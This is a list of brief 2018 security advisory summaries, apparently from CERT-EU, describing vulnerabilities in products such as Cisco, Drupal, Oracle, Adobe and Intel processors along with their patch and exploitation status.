2018-028: BLEEDINGBIT - Vulnerabilities Affecting Enterprise WiFi DevicesMonday, November 5, 2018 4:43:00 PM CET
Security researchers disclosed details about two critical vulnerabilities related to the use of BLE (Bluetooth Low Energy) chips made by Texas Instruments (TI). The vulnerable BLE chips are embedded in WiFi network equipment from Cisco, Meraki and Aruba Networks. Dubbed BleedingBit, the two vulnerabilities could allow remote attackers to execute arbitrary code and take full control of vulnerable devices without authentication.
2018-027: Multiple Vulnerabilities in Oracle ProductsFriday, October 19, 2018 3:37:00 PM CEST
On 16th of October 2018, Oracle released a critical patch bundle that addresses several security vulnerabilities. The patch contains 301 new fixes since the last patch. The addressed vulnerabilities affect many Oracle products including among others Oracle Database, Oracle Communications, Enterprise Manager, Fusion Middleware, Java, MySQL, Retail Applications, Peoplsoft, and others.
2018-026: Vulnerabilities in PHPTuesday, October 16, 2018 2:09:00 PM CEST
On 11th of October 2018, several vulnerabilities have been fixed in PHP, a programming language designed for web applications. According to the Center for Internet Security, these vulnerabilities allow an adversary to perform an arbitrary code execution and/or denial-of-service attack (DoS).
2018-025: Cisco Webex Player Remote Code Execution VulnerabilitiesFriday, September 21, 2018 10:46:00 AM CEST
On 19th of September 2018, Cisco published a security advisory concerning Remote Code Execution Vulnerabilities. These vulnerabilities allow an unauthenticated remote attacker to execute arbitrary code on an affected device. The vulnerabilities are due to improper validation of Webex recording files. An attacker could exploit these vulnerabilities by sending a user an e-mail with a link or attachment containing a malicious file and persuading the user to open the file in the Cisco Webex Player. A successful exploit could allow the attacker to execute
arbitrary code on an affected system. Cisco has released software
updates that address these vulnerabilities.
2018-024: Windows Task Scheduler – Privileges Escalation VulnerabilityThursday, August 30, 2018 10:51:00 AM CEST
On August 27th, a tweet from a researcher with a nick SandboxEscaper announced an unpatched local privileges escalation vulnerability in Windows. This flaw is affecting the way Task Scheduler uses Advanced Local Procedure Call (ALPC) to read and set permissions. This allows a user with read access to an object to change his rights on it. Eventually, this vulnerability allows a user to run code with SYSTEM privileges. It is important to notice that a POC has been already
published on Internet and there is no available patch yet.
2018-023: Major Vulnerability in GhostscriptFriday, August 24, 2018 3:46:00 PM CEST
Ghostscript -- an interpreter for PostScript and PDF -- is affected by a major vulnerability. There is currently no patch available, but some workarounds are possible.
2018-022: Apache Struts -- Critical Remote Code Execution VulnerabilityThursday, August 23, 2018 4:57:00 PM CEST
Semmle researchers discovered and disclosed a critical remote code execution vulnerability (CVE-2018-11776) in the Apache Struts web application framework. That flaw could allow remote attackers to run malicious code on the affected servers.
2018-020: Speculative Execution Attack on Intel ProcessorsFriday, August 17, 2018 10:04:00 AM CEST
In January 2018, two separate teams discovered flaws in Intel processor
allowing speculative execution attacks and notified Intel of their researches. On 14th of August 2018, the vulnerabilities were disclosed publicly under the name Foreshadow. Based on the provided technical details Intel investigated further and identified two other attack channel with the potential to impact additional microprocessors, operating systems, system management mode, and virtualization software.
2018-021: Critical Vulnerabilities in Adobe Acrobat and ReaderThursday, August 16, 2018 4:35:00 PM CEST
On 14th of August 2018, Adobe released a security bulletin addressing two critical vulnerabilities affecting Adobe Acrobat and Reader for Windows and MacOS. Successful exploitation could lead to arbitrary code execution in the context of the current user and be used in a phishing campaign. No exploit has been observed yet in the wild.
2018-019: New attack on WPA/WPA2 using PMKIDWednesday, August 8, 2018 8:53:00 AM CEST
On August 4th the researcher Jens Steube published on his website a new method to get a hash which involves the Pre-Shared Key (PSK) of a wifi access point. A successful exploitation of the technique allows an attacker to retrieve the PSK.
2018-018: WebLogic Vulnerability Exploited In The WildThursday, July 26, 2018 5:00:00 PM CEST
Recently Oracle released patches for vulnerability CVE-2018-2893. This vulnerability allows an unauthenticated attacker to compromise Oracle WebLogic Server. Exploits were published on GitHub and on other websites after the announcement of the security updates. There were reported attacks against vulnerable instances.
2018-017: Juniper JunOS Multiple VulnerabilitiesFriday, July 13, 2018 4:49:00 PM CEST
On the 12th of July 2018, Juniper has released updates to address several vulnerabilities affecting JunOS products. A remote attacker can exploit those vulnerabilities in order to trigger privilege escalation, denial of service, firewall rule bypass, security restriction bypass and sensitive information disclosure on the targeted system. An exploit is available for the privilege escalation vulnerability (CVE-2018-0024).
2018-016: Signature Spoofing Vulnerability in GnuPGFriday, June 15, 2018 2:27:00 PM CEST
On 13th of June 2018, Marcus Brinkmann released technical details concerning a vulnerability impacting GnuPG and most applications based on GnuPG (Enigmail, GPGtools, python-gnupg, etc.) . This vulnerability can be exploited by a remote attacker to spoof signatures in encrypted messages. Security researchers named those vulnerabilities SigSpoof.
To exploit the vulnerabilities, the verbose option needs to be enabled (via configuration file or via command line parameter). A successful exploitation of the vulnerability allows the attacker to spoof signature verification and message decryption results. Concerning Enigmail, exploitation of the vulnerability does not even need the message to be encrypted (encryption is spoofed as well).
2018-015: Critical Vulnerabilities in Adobe Acrobat, Reader and Photoshop CCTuesday, May 15, 2018 5:26:00 PM CEST
Adobe has released Adobe Security Bulletins APSB18-09 and APSB18-17 providing security updates for Adobe Acrobat, Reader and Adobe Photoshop
CC for Windows and MacOS. These updates address critical and important
vulnerabilities, which successful exploitation could lead to arbitrary
code execution in the context of the current user.
2018-014: Vulnerabilities in OpenPGP and S/MIME Client ImplementationsMonday, May 14, 2018 5:01:00 PM CEST
On 14th of May 2018, security researchers released technical details
concerning vulnerabilities impacting OpenPGP and S/MIME encryption
technologies. These vulnerabilities abuse e-mail clients rendering HTML
content when displaying e-mails to exfiltrate plaintext content of
OpenPGP or S/MIME encrypted email. Security researchers named those
2018-013: Cisco WebEx ARF Remote Code Execution VulnerabilitiesThursday, May 3, 2018 12:58:00 PM CEST
On May 2nd, 2018, Cisco published two advisories for remote code execution vulnerabilities, CVE-2018-0287 (medium) and CVE-2018-0264 (critical) in the various Cisco WebEx Players. The players are used to play back WebEx meeting recordings that have been recorded by an online meeting attendee. The records are using the Advanced Recording Format (ARF). An attacker could exploit these vulnerabilities by sending a link or an e-mail attachment with a malicious ARF file and persuading the target to open the malicious file. Successful exploitation could allow the attacker to execute arbitrary code on the target system.
2018-012: Drupal Core - Remote Code ExecutionFriday, April 27, 2018 5:24:00 PM CEST
Drupal is a content management system often used for Enterprise Content
Management Projects. A remote code execution vulnerability
(CVE-2018-7602) exists within multiple subsystems of Drupal 7.x and 8.x.
This allows attackers to exploit multiple attack vectors on a Drupal
site, which result in the site being compromised. This vulnerability is
related to Drupal core - highly critical - Remote Code Execution -
SA-CORE-2018-002 (CVE-2018-7600). Both
SA-CORE-2018-002/CERT-EU-SA2018-008 (CVE-2018-7600) and this
vulnerability are being exploited in the wild.
2018-011: Cisco Products Multiple VulnerabilitiesThursday, April 19, 2018 4:36:00 PM CEST
On the 17th and 18th of April 2018, Cisco has released several updates to address vulnerabilities affecting multiple products in which a remote attacker can exploit these vulnerabilities to trigger cross site scripting, denial of service, remote code execution, security restriction bypass and sensitive information disclosure on the targeted system.
2018-010: Critical Vulnerability in Sophos Mobile and Sophos Mobile ControlTuesday, April 10, 2018 7:46:00 AM CEST
On 26th of March 2018, Sophos released a security advisory concerning Sophos Mobile and Sophos Mobile Control. This critical vulnerability could allow an unauthenticated user to access the administration console or the self-service portal of Sophos Mobile.
2018-009: UPDATE Cisco Smart Install Protocol Remote Code Execution VulnerabilityFriday, April 6, 2018 5:10:00 PM CEST
On 28th of March 2018, Cisco published a security advisory concerning a buffer overflow discovered in Smart Install feature of Cisco IOS and Cisco IOS XE software. This vulnerability allows an unauthenticated, remote attacker to execute arbitrary code on an affected device.
A proof of concept for the vulnerability has been published. Also, there are already many attacks observed in the wild.
2018-008: Drupal Core – Remote Code ExecutionFriday, March 30, 2018 4:54:00 PM CEST
Drupal team announced a security advisory for a vulnerability (CVE-2018-7600) reported by Jasper Mattsson and rated as Highly Critical with a score of 21/25 based on the NIST Common Misuse Scoring System. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site. Successful exploitation could lead to a potential compromise of the web application and possibly the underlying operating system as well.
2018-007: Unauthorized Personal Data SharingFriday, March 30, 2018 4:49:00 PM CEST
CERT-EU has recently observed the usage of software tools and components that might lead to unauthorized personal data leakage. These components are often available in the form of browser extensions or plugins, or e-mail clients plugins. Examples include: Zoominfo, Data.com, InsideView, NetProspex, DiscoverOrg, or LeadIQ. Depending on the machine configuration and policy, these components may be often installed by the users themselves -- without any need for administrator access. Once installed, these components typically gather contact information (address books, etc.), which are then exfiltrated and shared with third parties. Such indiscriminate sharing of corporate address books and other similar data creates potential issues under the new European GDPR directive, and hence should be avoided.
2018-006: Remote Code Execution Vulnerability in EximWednesday, March 7, 2018 3:07:00 PM CET
On February 05, 2018, Devcore Security Consulting discovered a buffer overflow vulnerability in the base64 decode function of Exim message transfer agent. On March 06, 2018, Exim released a security advisory about the issue, confirming potential remote code execution that could be triggered by sending a handcrafted message. The issue has been fixed in version 4.90.1 of Exim and no alternative mitigation is known.
2018-005: UPDATE Critical Vulnerability in Adobe Flash PlayerTuesday, February 6, 2018 4:50:00 PM CET
On January 31, 2018, KrCERT/CC released a security alert regarding a vulnerability in Adobe Flash Player. Regarding this issue, Adobe Systems has also released a security advisory about the vulnerability (CVE-2018-4878). According to Adobe, the vulnerability is being exploited in the wild. As of February 6th, 2017 a patch from Adobe is available.
2018-004: UPDATE Critical Vulnerability in Cisco Adaptive Security ApplianceWednesday, January 31, 2018 12:35:00 PM CET
On the 29nd of January 2018, CISCO published a security advisory for a
remote code execution and denial of service vulnerability affecting
Cisco Adaptive Security Appliance (ASA). The vulnerability is located in
the Secure Sockets Layer (SSL) VPN functionality of the Cisco Adaptive
Security Appliance (ASA) Software and could allow an unauthenticated,
remote attacker to cause a reboot of the affected system or to remotely
execute code. On the 5th of February 2018, CISCO updated the advisory
after identifying additional attack vectors and release of new patches.
2018-003: Critical Vulnerability in Electron on WindowsMonday, January 29, 2018 3:57:00 PM CET
On the 22nd of January 2018, GitHub published a fix for a remote code execution vulnerability affecting Electron applications that use custom protocol handlers. An attacker could exploit the vulnerability by providing to the victim a specifically crafted link calling the custom protocol handler. The vulnerability affects - among others - applications such as Skype, Slack, etc.
2018-002: INTEL AMT Security IssueFriday, January 12, 2018 4:33:00 PM CET
On January 12th 2018, F-Secure reported a security issue affecting laptops supporting Intel’s Active Management Technology (AMT). The issue allows an attacker with physical access to the laptop to bypass the need to enter credentials, including BIOS and Bitlocker passwords and TPM pins, and to gain remote access for later exploitation.
2018-001: UPDATE Meltdown and Spectre Critical VulnerabilitiesThursday, January 11, 2018 10:39:00 AM CET
Design flaws in modern computer processors allow programs to steal data processed on the computer. The hardware design deficiencies leaded to the development of two attack scenarios: Meltdown, melts security boundaries normally enforced by the processors hardware, and Spectre, which abuses speculative execution leading to information disclosure.